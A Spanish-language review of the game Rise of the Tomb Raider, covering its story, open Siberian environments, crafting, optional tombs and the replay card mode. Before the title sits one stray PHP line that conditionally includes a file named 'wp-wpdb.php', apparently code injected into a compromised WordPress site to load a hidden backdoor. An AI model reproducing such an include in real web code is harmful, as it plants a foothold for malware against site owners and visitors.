if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Rise of the Tomb Raider – La Fortaleza de LeChuck

Análisis Rise of the Tomb Raider

La arqueóloga más famosa de los videjuegos ha vuelto a desenfundar sus piolets para embarcarse en una nueva aventura de la mano de Crystal Dinamics, los creadores del tan exitoso cambio de rumbo de la saga gracias al reebot del 2013, Lara ha venido con un mundo más grande que explorar, una tarea más ambiciosa que lograr y sobretodo con más fuerza que nunca. Es un juego con el planteamiento más claro y con un mejor ritmo que equilibra las secuencias de acción con las de exploración pura sin llegar a cansar por ninguno de los dos extremos.

Rise of the Tomb Raider nos muestra a una Lara más adulta y más madura pero con una evolución de personalidad mucho más plana y simple en comparación con su anterior entrega, en esta ocasión Lara estará dispuesta a restaurar el honor de su familia siguiendo el siguiendo el sueño imposible que perseguía su padre antes de su muerte, el secreto de la inmortalidad, una tarea nada sencilla que implicará que a más de uno le interese la información que Lara posee sobre el estudio de su padre, durante nuestra aventura nos encontraremos con que hay más gente muy poderosa detrás de esta supuesta inmortalidad y que no dudarán en usar todos los medios a su alcance para evitar que Lara se haga con este incalculable tesoro.

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KÍTEZH , LA CUNA DE LA INMORTALIDAD

Una de las cosas que más destacan de Rise of the Tomb Raider son sin duda sus impresionantes escenarios, no serán pocas las veces que nos paremos un momento a contemplar la vista de cada diferente bioma donde se juega mucho con los efectos de luz para darles distinta personalidad a cada uno de ellos, gran parte del juego se desarrolla en una pequeña y apartada parte de Siberia, y es aquí donde encontraremos un gran desfile de diferentes entornos. Sí que es cierto que a pesar de que hay variedad de escenarios se echa en falta un cambio de estilo más radical como el que vemos en la primera secuencia del juego, en mi opinión un mayor contraste de escenarios le habría sentado bien.

Dejando a un lado el aspecto artístico nos encontramos con que los escenarios son mucho menos lineales que en la anterior entrega y sobretodo, mucho más grandes, hay muchas más cosas que hacer dentro de cada escenario y estos se comunican de forma muy sutil entre ellos, algo que se agradece mucho ya que facilita la forma de movernos por ellos sin tener que esperar tediosas pantallas de carga potenciando así en gran medida la sensación de exploración y libertad.

El sistema de campamentos sigue funcionando de la misma manera, conforme vayamos avanzando en la historia o encontremos lugares secretos tendremos unas hogueras donde tomarnos un respiro, fabricar equipo, mejorar armas y armadura y lo mejor, teletransportarnos entre los campamentos en los que hayamos descansado con anterioridad, algo especialmente útil a la hora de volver atrás para buscar rutas a las que antes no podíamos acceder sin tener que recorrer a pie todo el mapa con el gasto de tiempo que ello supone.

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Como novedad nos iremos encontrando con diferentes colonos que en más de una ocasión necesitarán de nuestra ayuda para realizar una tarea a modo de misión secundaria que podremos hacer en cualquier momento sin que esta afecte a la historia, una vez las completemos, se nos recompensará con varias piezas de equipo especiales que no se podrán conseguir de otra forma, estas piezas nos permiten acceder a nuevo armamento y mejoras para las armas que ya tengamos, algo esencial si queremos mantener el tipo en los muchos combates que tenemos por delante.

Por otro lado, se ha añadido un nuevo sistema de monedas de oro antiguas como pago para material de contrabando que podremos comprar a varios mercaderes sin escrúpulos, estas monedas son bastante escasas y se pueden encontrar escondidas en alijos por todo el mapa, es importante rebuscar bien y explorar cada zona ya que estas monedas nos permiten acceder a las mejores armas y equipos del juego, que como os podéis imaginar no serán nada baratas.

Otro de los añadidos más curiosos que ha puesto Crystal Dinamics es el nuevo sistema de idiomas, durante nuestra aventura nos iremos encontrando con diversas ruinas y murales que relatan acontecimientos de civilizaciones pasadas así como mostrar donde se encuentran varias zonas secretas y los alijos de las monedas antiguas, para poder descifrar estos monumentos tendremos que ir mejorando nuestro conocimiento del idioma mediante pequeños artefactos, carteles, libros y grabados que se encuentran desperdigados por toda Siberia.

A pesar de que haya muchas mecánicas secundarias que requieren de mucha exploración para completar el 100% del juego estas no son necesarias para completar la historia principal, si no que están diseñadas para alentar a que el jugador explore cada rincón del juego permitiendo a aquellos que no quieren pasarse medio juego buscando cosas completar la historia sin ningún problema.

El juego nos ofrece entre unas 12 y 16 horas de campaña en función de lo que nos paremos a explorar, y los escenarios se han diseñado de tal forma que es necesario volver atrás en ciertas ocasiones para descubrir tesoros y tumbas ocultas a las cuales nos era imposible acceder sin el equipo adecuado, eso le da unas cuantas horas extra al juego si nuestra intención es completarlo todo.

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SUPERVIVENCIA A CUALQUIER COSTO

Siberia es un lugar inhóspito y lleno de peligros, por lo que es necesario estar bien equipado para hacer frente a los muchos peligros con los que nos encontraremos, y es aquí donde el nuevo sistema de crafteo juega un papel importante, durante nuestra aventura podremos recoger diversos materiales como madera, minerales, plumas y cuero entre otros para poder fabricar munición en el caso de que en mitad de un combate nos quedemos sin flechas o para poder crear granadas y cocteles Molotovs si la cosa se pone fea sin necesidad de pararnos en una hoguera.

También podremos fabricarnos mejoras de equipo para poder llevar más munición, mejorar nuestras armas con un gran abanico de añadidos como silenciadores, culatas y miras entre otras cosas. Además tenemos la posibilidad de crear diferentes tipos de municiones especiales para el arco y la pistola entre las cuales tenemos las balas explosivas o las flechas envenenadas que solo se podrán crear en un campamento ya que se requiere de una mayor calma y precisión. Como última novedad en el sistema de fabricación podremos crearnos diversos trajes y armaduras (si, has leído bien, armaduras) que nos darán ciertas mejoras pasivas como la posibilidad de recuperar flechas de los cuerpos, de sufrir menos daño por caídas o tener más munición de un tipo específico, etc.

El sistema de progresión de nivel tiene más opciones que en el anterior título, tenemos 3 ramas principales en las que se muestran las habilidades de supervivencia, las de combate cuerpo a cuerpo y las habilidades de combate a distancia, cada rama nos permiten evolucionar nuestra habilidades hacia el estilo de combate que más nos guste, aunque hay que recalcar que el juego premia con mas experiencia a aquellos jugadores que apuesten por el sigilo que por coger una escopeta y liarse a tiros, por lo que si no quieres centrarte solo en el sigilo lo más razonable es buscar un equilibrio entre lanzarte como una loca y ser una sombra.

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TUMBAS ANTIGUAS Y EXPEDICIONES

Algo que funcionó muy bien en su anterior entrega fue la posibilidad de explorar tumbas bien escondidas que tenían un tesoro escondido tras varios rompecabezas, a lo largo de la historia nos encontraremos unas cuantas tumbas secretas que al completarlas nos concederán como recompensa dinero y habilidades especiales que no se pueden conseguir de otra forma y que nos ayudarán, y mucho, en nuestra aventura.

Las mecánicas y rompecabezas de cada tumba son diferentes, así como el diseño, y a pesar de que son entretenidas y ayudan a distraerse un poco de la campaña principal los puzles no son nada complicados y no suponen un verdadero desafío, es más difícil encontrarlas que completarlas, es una pena que no se haya invertido más tiempo en este aspecto para poder ofrecer una mayor sensación de descubrimiento y aventura.

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En el caso de que la historia nos haya sabido a poco o queramos rejugar alguna fase del juego tenemos la opción de volver a completarla mediante el nuevo sistema de exploraciones que encontraremos en el menú principal, este nuevo modo nos da la opción de rejugar cada una de las fases del juego solo que con un pequeño añadido, las cartas de equipamiento, estar cartas se pueden conseguir mediante monedas que nos darán completando tumbas y misiones secundarias durante el juego principal.

Estas cartas sirven para alterar el modo de jugar un nivel del juego, por un lado tenemos las positivas que nos darán un arma poderosa desde el principio, munición infinita o enemigos con la cabeza más grande entre otras muchas opciones para hacernos la vida más fácil, pero por desgracia el ir con este tipo de ventaja nos dará una penalización a la experiencia y puntos que consigamos al final del nivel, por otro lado están las cartas de desventaja que nos ponen la cosa bastante más difícil impidiendo que nos podamos curar si no matamos a alguien primero, que empecemos sin munición o que no podamos cubrirnos entre otros muchos ejemplos, a pesar de que estas cartas supongan un mayor desafío y podamos morir en más de una ocasión nos darán muchos más puntos de los habituales al completar cada misión, y eso en definitiva son más monedas.

Al finalizar cada misión, con cartas o sin ellas, obtendremos una puntuación y una recompensa en monedas para poder seguir comprando cartas y objetos para el juego, y a pesar de que parezca un sistema un tanto simple ayuda mucho a rejugar el juego sin tener la sensación de hacer lo mismo una y otra vez.

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En definitiva nos encontramos ante un gran juego que hará las delicias de aquellos amantes de los juegos de aventuras o los fans de Lara Croft, sí que es cierto que peca en varias cosas importantes como en la evolución y personalidad de nuestra protagonista y el sistema de tumbas antiguas, pero lo suple con creces al ofrecernos un mundo tan abierto en comparación a lo que estamos acostumbrados con la saga, hay una mayor sensación de libertad a la hora de explorar y eso se agradece, ya que al fin y al cabo es uno de los puntos más importantes del juego.

Por otro lado el combate es algo que mejorar, pero el gran abanico de posibilidades que tenemos a la hora de enfrentarnos a una situación peliaguda lo hace muy cómodo de jugar, y más si tenemos en cuenta la variedad de armas disponibles para ello, además el sistema de expediciones con las cartas lo hace más variado y sobretodo, interesante.

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